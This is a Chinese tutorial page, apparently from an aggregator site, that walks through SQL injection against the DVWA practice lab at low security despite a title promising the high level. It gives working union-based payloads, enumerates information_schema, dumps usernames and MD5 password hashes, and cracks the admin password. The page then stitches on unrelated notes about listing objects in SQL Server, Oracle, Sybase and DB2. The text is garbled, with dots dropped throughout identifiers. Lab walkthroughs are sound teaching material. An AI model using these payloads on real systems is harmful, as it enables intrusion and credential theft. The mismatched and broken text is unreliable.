dvwa sql injection high级怎么破

1、设置

把安全等级先调整为low，让自己获得点信心，免得一来就被打脸。

2、测试和分析页面的功能

这里有一个输入框

根据上面的提示，输入用户的id。然后我们输入之后，发现它返回了关于这个user的信息！这里我们输入了“1”。

它返回三行数据，一行是我们输入的用户ID。一行是用户名，另外一行是用户别名。同时，看一下浏览器的地址栏那里，发现url成这样了

这里有个id=1，是不是就是我们输入的user id呢？再输入“2”，发现url变成了

好了，到这里，我们可以得出这里传进去的id的值是我们可以控制的。我们在输入框中输入什么，就会通过id传进去什么！

3、对参数进行测试

对id这个参数进行测试，查看一下它是否存在sql注入漏洞。我们在输入框里面输入“1'”，注意1后面有一个单引号“'”。

发现这里报错了，说我们的sql语句出现了语法错误。

我们可以进行这样一个猜测：首先它这个id是被两个“'”包住的。查询语句可能是这样的：

select firstname,surname from users where id = '1';

当我们在1之后加一个引号，则会导致单引号数目不平衡，那么查询语句会变成这样：

select firstname,surname from users where id = '1'';

可以看到最后一个引号没被闭合，那我们该怎么办呢？其实有好多种解决的办法，下面就简单介绍下。

方法一：可以在原来的基础上再继续输入一个引号，也就是“1''”。这时我们看一下查询语句：

select firstname,surname from users where id = '1''';

在where语句中，当出现多个字符串的时候，“=”将会选择优先级最高的一个，优先级是从左到右，依次降低的，也就是离“=”最近的一个。

看到了么，出来的结果还是和user_id=1一样。

方法二：使用“#”符号来注释后面的单引号，到时查询语句将会变成这样：

select firstname,surname from users where id = '1'#';

方法三：使用“-- ”。这里注意了“-- ”后面有一个空格。在url当中，我们可以使用“+”来代替“--”后面的空格。到时查询语句将会变成这样：

select firstname,surname from users where id = '1'--+';

上面显示出来的结果和输入1时一样。到这里我们就可以确定：

漏洞的参数是“id”。

漏洞的类型是字符型。

4、构造payload

好了，在我们确认漏洞之后，就可以构造payload了。什么是payload？说白了就是一段恶意代码，以便我们能够获得数据库里面的数据。

41 分析字段数

分析字段数的话，也是有两种方法。

方法一：用order by 语句。

分析字段数的原因是我们之后需要用union select语句来获得我们需要的敏感数据。根据order by知识知道，要是后面跟着的数字超出了字段数时，就会报错！通过这个我们可以确定字段数。我们构造的payload如下：

1' order by 1#

1' order by 2#

1' order by 3#

当输入到3的时候，发现它报错了，也就是说字段数为2。

方法二：直接用union select来猜测字段数。

因为当字段数不对应的时候，它也是会发生报错的！我们构造以下查询语句：

1' union select 1#

1' union select 1,2#

1' union select 1,2,3#

可以发现，当union select 1,2,3的时候报错，union select 1,2的时候没有报错，也就是说字段数为2。同时，我们也注意到，好像返回的内容中多了三条数据，这是啥呢？其实这就是我们union select出来的数据。这样通过查看页面，我们便可以获得数据库里面的信息了！

42 获取信息

字段数为2，说明数据列有两列。我们可以通过union select语句查出两个数据。好了，我们来获取所需要的数据库里面的信息吧！

421 获取当前数据库名，当前用户名

构造数据库查询语句如下所示：

1' union select database(),user()#

解释一下，database()将会返回当前网站所使用的数据库名字，user()将会返回进行当前查询的用户名。

好的，我们可以看到当前使用的数据库为：dvwa，当前的用户名：root@localhost。

有时候，后面的select语句会限制输出的行数，一般来说，都会让原数据库查询无效，也就是输入无效的id，使得原数据库查询不反回结果。如下 *** 作：

-1' union select database(),user()#

这样就只会返回我们需要的数据了。

类似的函数还有：version() 获取当前数据库版本,@@version_compile_os获取当前 *** 作系统。

-1' union select version(),@@version_compile_os#

数据库版本高于50就可以爆库了，下面会具体讲解。

422 获取当前的用户表

根据上面的信息，我们知道当前数据库名为dvwa，可是还不够呀，表名是什么？内容又是什么？是不是打算放弃了？先吃根辣条冷静一下吧。

想想看，当你有不懂的字会怎么办呢？不要动不动就去百度，除了问度娘，还能怎么做呢？对了，查字典。那么mysql有没有类似于字典的东西呢？答案是肯定的，就是information_schema，这是一个包含了mysql数据库所有信息的“字典”，本质上还是一个database，存放着其他各个数据的信息。

在information_schema里，有一个表tables。有一个columns……是不是有点感觉了？ tables这个表存放的是关于数据库中所有表的信息，里面有个字段叫table_name，还有个字段叫做table_schema。其中table_name是表名，table_schema表示的是这个表所在的数据库。对于columns，它有column_name，table_schema，table_name。回想一下，我们拥有的信息是数据库名。也就是说我们可以构造这样的payload来从数据库里获取一些东西。

好的，构造的查询语句如下：

-1' union select table_name,2 from information_schematables where table_schema= 'dvwa'#

爆出来两个表，对那个感兴趣呢？？？当然是users表啦！不是说还有一个columns表么？所以我们还需要table_name以及table_schema来查column_name。这次我们构造的payload如下：

-1' union select column_name,2 from information_schemacolumns where table_schema= 'dvwa' and table_name= 'users'#

这里简单说一下，倘若不指定数据库名为'dvwa'，若是其他数据里面也存在users表的话，则会出现很多混淆的数据。当然，在这里直接使用下面的语句也是可以成功的。

-1' union select column_name,2 from information_schemacolumns where table_name='users'#

跟上一条结果一样吧？

又来了，这么多数据，选哪个呢？？？废话，当然是user，password啦。我们再次修改payload：

-1' union select user,password from users#

Binggo！我们爆出所有的用户名和密码值！等等，这密码好像有点奇葩，数一数，32位！好吧，是经过md5加密的。好不容易爆出管理员账号和密码，但是密码却加密，这就没有办法了吗？不一定！我们需要找一些破解md5值的网站来进行破解！直接百度“CMD5”，然后选择一个网站进去破解就可以了。

我们选择admin这个来进行破解，md5密文为：21232f297a57a5a743894a0e4a801fc3。

可以看到密码已经被破解出来了，密码是“admin”,好的，我们来验证一下！

看，这个时候我们已经成功登陆了！

好的，简单的SQL注入就说到这儿了，下次我们将进行DVWA里面的中级SQL注入。

常用工具有：phpMyAdmin，或者Navicat，

或者在mysql文件下的命令提示符中输入：

mysqlbinmysql

-h主机地址

-u

用户名

－p

用户密码//登录

show

databases;//显示数据库名

use

dataname；//显示数据库中的表

show

tables；

Select name from mastersysdatabases

where name not in('master','model','msdb','tempdb','northwind','pubs')

取得视图的方法 系统存储过程 USE xxx EXEC sp_help 或者 获取指定数据库的视图： USE DBAudit SELECT sysobjectsname AS name, sysusersname AS owner FROM sysobjects LEFT JOIN sysusers ON sysobjectsuid = sysusersuid WHERE type = 'V' 获取指定数据库的视图的内容： EXEC sp_helptext xxxObject 取得存储过程的方法 系统存储过程 USE xxx EXEC sp_help 或者 获取指定数据库的存储过程或者扩展存储过程： USE DBAudit SELECT sysobjectsname AS name, sysusersname AS owner, type FROM sysobjects LEFT JOIN sysusers ON sysobjectsuid = sysusersuid WHERE type = 'P' OR type = 'X' 获取指定数据库的存储过程或者扩展存储过程的内容： EXEC sp_helptext xxxObject 无法获取加密的存储过程。扩展存储过程只能得到dll 程序名。 取得函数的方法 系统存储过程 USE xxx EXEC sp_help 或者 获取指定数据库的各种函数（内嵌函数等）： USE DBAudit SELECT sysobjectsname AS name, sysusersname AS owner, type FROM sysobjects LEFT JOIN sysusers ON sysobjectsuid = sysusersuid WHERE type = 'FN' OR type = 'IF' OR type = ‘TF’ 获取指定数据库的函数的内容： EXEC sp_helptext xxxObject 只能获取用户定义的函数内容。 取得触发器的方法 系统存储过程 USE xxx EXEC sp_helptrigger xxxTable 或者 获取指定数据库的表的触发器： SELECT sysobj1name AS name, sysusersname AS owner FROM sysobjects AS sysobj1 LEFT JOIN sysobjects AS sysobj2 ON sysobj1parent_obj = sysobj2id LEFT JOIN sysusers ON sysobj1uid = sysusersuid WHERE sysobj1type = 'TR'AND sysobj2name = 'xxxTable' 取得索引的方法 系统存储过程 USE xxx EXEC sp_helpindex xxxTable 用户 系统存储过程 USE xxx EXEC sp_helpuser 角色 系统存储过程 USE xxx EXEC sp_helprole 第二部分： 对于oracle 而言： ORACLE 只能连接特定数据库，不能自动扫描数据库对象。ORACLE 表必须用用户来区别，否则表可能重名。ORACLE 不能区别系统表或者是用户表，因此只能由管理员选择扫描某些特定用户的表。 取得数据库名的方法 只能由用户指定数据库，不能自动扫描到特定数据库服务器上的所有数据库。 取得表的方法 存储数据库表的系统表/视图主要有： DBA_ALL_TABLES 描述数据库中所有的对象以及相关的表。 ALL_ALL_TABLES 描述数据库中所有的用户可以访问的对象以及相关的表。 USER_ALL_TABLES 描述数据库中当前用户拥有的对象以及相关的表。 DBA_ TABLES 描述数据库中所有相关的表。 ALL_ TABLES 描述数据库中所有的用户可以访问的相关的表。 USER_ TABLES 描述数据库中当前用户拥有的相关的表。 因此，可以从ALL_TABLES 中取得隶属于指定用户的表： SELECT TABLE_NAME FROM SYSALL_TABLES WHERE OWNER = 'DBAUDIT'; 取得隶属于指定表空间的表： SELECT TABLE_NAME FROM SYSALL_TABLES WHERE TABLESPACE_NAME = 'DBAUDIT'; 也可以不指定用户名，从而取得所有的表。 SELECT TABLE_NAME FROM SYSALL_TABLES； 取得列的方法 存储数据库表的列属性的系统表/视图主要有： DBA_TAB_COLUMNS 描述数据库中所有的表的列属性。 ALL_TAB_COLUMNS 描述数据库中所有的用户可以访问的表的列属性。 USER_TAB_COLUMNS 描述数据库中当前用户拥有的表的列属性。 ALL_TAB_COLS 描述数据库中所有的用户可以访问的表的列属性。 因此，可以从ALL_TAB_COLUMNS 中取得隶属于指定用户的表： SELECT COLUMN_NAME FROM SYSALL_TAB_COLUMNS WHERE TABLE_NAME = 'TASK' AND OWNER = 'DBAUDIT'; 取得视图的方法 存储数据库视图的系统表/视图主要有： DBA_VIEWS 描述数据库中所有的视图的属性。 ALL_VIEWS 描述数据库中所有的用户可以访问的视图的属性。 USER_VIEWS 描述数据库中所有的当前用户拥有视图的属性。 因此，可以从ALL_VIEWS 中取得隶属于指定用户的视图： SELECT VIEW_NAME FROM SYSALL_VIEWS WHERE OWNER = 'DBAUDIT'; 取得存储过程的方法 存储系统对象的系统表/视图有： DBA_OBJECTS 描述数据库中所有的对象。 ALL_OBJECTS 描述数据库中所有的可以访问的对象。 USER_OBJECTS 描述数据库中所有的当前用户拥有的对象。 SYS_OBJECTS 描述数据库中所有的系统对象。 对象类型有： CONSUMER GROUP CONTEXT DIRECTORY FUNCTION INDEX INDEX PARTITION INDEXTYPE JAVA CLASS JAVA DATA JAVA RESOURCE JAVA SOURCE LIBRARY LOB MATERIALIZED VIEW OPERATOR PACKAGE PACKAGE BODY PROCEDURE QUEUE SEQUENCE SYNONYM TABLE TABLE PARTITION TRIGGER TYPE TYPE BODY VIEW 因此，取得存储过程可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'PROCEDURE'; 取得隶属于某个用户的存储过程可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'PROCEDURE' AND OWNER = ‘DBAUDIT’; 同样，取得其他的对象也可以用这个方法，包括表，视图等。 取得存储过程内容的方法 对象类型为类型、类型体、过程、函数、包、包体，JAVA 源代码的所有对象的源代码都存储在几个系统表/视图中： DBA_SOURCE 存储所有数据库对象的源代码。 ALL_SOURCE 存储所有可以访问的数据库对象的源代码。 USER_SOURCE 存储所有当前用户拥有的数据库对象的源代码。 因此，取得存储过程源代码的方法： SELECT TEXT FROM SYSALL_SOURCE WHERE NAME = ‘XXX’ AND TYPE = ‘PROCEDURE’; 取得函数的方法 同上，取得函数可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'FUNCTION'; 取得隶属于某个用户的函数可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'FUNCTION' AND OWNER = 'DBAUDIT'; 取得函数内容可以用： SELECT TEXT FROM SYSALL_SOURCE WHERE NAME = 'XXX' AND TYPE = 'FUNCTION'; 取得触发器的方法 存储数据库触发器的系统表/视图主要有： DBA_TRIGGERS 描述数据库中所有的触发器的属性。 ALL_ TRIGGERS 描述数据库中所有的用户可以访问的触发器的属性。 USER_ TRIGGERS 描述数据库中所有的当前用户拥有触发器的属性。 因此，可以从ALL_TRIGGERS 中取得隶属于指定用户的触发器： SELECT TRIGGER_NAME FROM SYSALL_TRIGGERS WHERE OWNER = 'DBAUDIT'; 取得触发器内容的方法： SELECT TRIGGER_BODY FROM SYSALL_TRIGGERS WHERE TRIGGER_NAME = 'XXX'; 取得索引的方法 存储数据库索引的系统表/视图主要有： DBA_INDEXES 描述数据库中所有的索引的属性。 ALL_INDEXES 描述数据库中所有的用户可以访问的索引的属性。 USER_INDEXES 描述数据库中所有的当前用户拥有索引的属性。 因此，可以从ALL_ INDEXES 中取得隶属于指定用户的索引： SELECT INDEX_NAME,TABLE_NAME FROM SYSALL_INDEXES WHERE OWNER = 'DBAUDIT'; 取得索引相关的列的方法： SELECT COLUMN_NAME FROM SYSALL_IND_COLUMNS WHERE INDEX_NAME = 'XXX' AND TABLE_OWNER = 'DBAUDIT'; 用户 存储数据库用户的系统表/视图主要有： DBA_USERS 描述数据库中所有的用户的属性。 ALL_USERS 描述数据库中所有的用户的属性。 USER_USERS 描述数据库中当前用户的属性。 因此，可以从ALL_USERS 中取得用户： SELECT USER_ID, USERNAME FROM SYSALL_USERS; 角色 存储角色的表/视图有： DBA_ROLES 描述数据库中所有角色。 取得角色方法： SELECT ROLE FROM SYSDBA_ROLES; 表空间 SELECT TABLESPACE_NAME FROM SYSDBA_TABLESPACES; 数据文件 SELECT FILE_NAME, FILE_ID, TABLESPACE_NAME FROM SYSDBA_DATA_FILES; 数据库连接 存储数据库连接的系统表/视图主要有： DBA_LINKS 描述数据库中所有的连接的属性。 ALL_LINKS 描述数据库中所有的用户可访问的连接的属性。 USER_LINKS 描述数据库中当前用户的连接属性。 因此，可以从DBA_DB_LINKS 中取得连接： SELECT FROM SYSDBA_DB_LINKS; 同义词 SELECT FROM SYSALL_SYNONYMS WHERE TABLE_OWNER = 'DBAUDIT'; 程序包 取得程序包可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'PACKAGE'; 取得隶属于某个用户的程序包可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'PACKAGE' AND OWNER = 'DBAUDIT'; 取得程序包内容可以用： SELECT TEXT FROM SYSALL_SOURCE WHERE NAME = 'XXX' AND TYPE = 'PACKAGE'; 程序包体 取得程序包体可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'PACKAGE BODY'; 取得隶属于某个用户的程序包可以用： SELECT OBJECT_NAME FROM SYSALL_OBJECTS WHERE OBJECT_TYPE = 'PACKAGE BODY ' AND OWNER = 'DBAUDIT'; 取得程序包内容可以用： SELECT TEXT FROM SYSALL_SOURCE WHERE NAME = 'XXX' AND TYPE = 'PACKAGE BODY '; 第三部分： 简单点的还有。 返回所有列名 select name from syscolumns where id=object_id('表名') 查所有表名 select from INFORMATION_SCHEMATABLES =================================== sp_tableoption N'MyTable', 'text in row', 'OFF' Sybase 取得数据库名的方法 系统存储过程sp_helpdb 或者 USE master SELECT dname dbname, uname owner FROM sysdatabases d, sysusers u WHERE dsuid = usuid 取得表的方法 系统存储过程 USE xxx EXEC sp_help 或者 获取指定数据库的用户表： USE DBAudit SELECT sysobjectsname AS tname, sysusersname AS owner FROM sysobjects, sysusers WHERE sysobjectsuid = sysusersuid AND type = 'U' 获取指定数据库的系统表： USE DBAudit SELECT sysobjectsname AS tname, sysusersname AS owner FROM sysobjects, sysusers WHERE sysobjectsuid = sysusersuid AND type = 'S' 或者统一使用： USE DBAudit SELECT sysobjectsname AS tname, sysusersname AS owner FROM sysobjects, sysusers WHERE sysobjectsuid = sysusersuid AND (type = 'U' OR type = 'S') 注： sysobjects 中type 字段类型解释： C = CHECK 约束 D = 默认值或 DEFAULT 约束 F = FOREIGN KEY 约束 L = 日志 FN = 标量函数 IF = 内嵌表函数 P = 存储过程 PK = PRIMARY KEY 约束（类型是 K） RF = 复制筛选存储过程 S = 系统表 TF = 表函数 TR = 触发器 U = 用户表 UQ = UNIQUE 约束（类型是 K） V = 视图 X = 扩展存储过程 取得列的方法 系统存储过程 USE xxxDatabase EXEC sp_help xxxTable 取得视图的方法 系统存储过程 USE xxx EXEC sp_help 或者 获取指定数据库的视图： USE xxx SELECT sysobjectsname AS name, sysusersname AS owner FROM sysobjects, sysusers WHERE sysobjectsuid = sysusersuid AND type = 'V' 获取指定数据库的视图的内容： EXEC sp_helptext xxxObject 取得存储过程的方法 系统存储过程 USE xxx EXEC sp_help 或者 获取指定数据库的存储过程或者扩展存储过程： USE xxx SELECT sysobjectsname name, sysusersname owner FROM sysobjects, sysusers WHERE sysobjectsuid = sysusersuid AND (type = 'P' OR type = 'X') 获取指定数据库的存储过程或者扩展存储过程的内容： EXEC sp_helptext xxxObject 无法获取加密的存储过程。扩展存储过程只能得到dll 程序名。 取得函数的方法 Sybase 不支持用户定义函数。

如果是db2 的表名：

list tables

得到每一个表的详细信息字段名，字段属性（类型，文字长度，备注）

describe table 具体的表名

平时我就这么获得这些信息

查询mysql中所有数据库名称

一，这种方法像执行普通的SQL语句一下，sql如下：

SELECT `SCHEMA_NAME`

FROM `information_schema``SCHEMATA`

二，

List<String> list=new ArrayList<String>();

//String sql="SELECT SCHEMA_NAME FROM information_schemaSCHEMATA";

try{

//Statement st=(Statement) conncreateStatement();

DatabaseMetaData dmd=(DatabaseMetaData) conngetMetaData();

ResultSet rs=dmdgetCatalogs();

while(rsnext()){

listadd(rsgetString("TABLE_CAT"));

}

}catch(SQLException e){

eprintStackTrace();

}

以上就是关于dvwa sql injection high级怎么破全部的内容，包括:dvwa sql injection high级怎么破、如何查询MySQL服务器中的所有数据库名称、如何获取SQL中所有数据库的名称等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！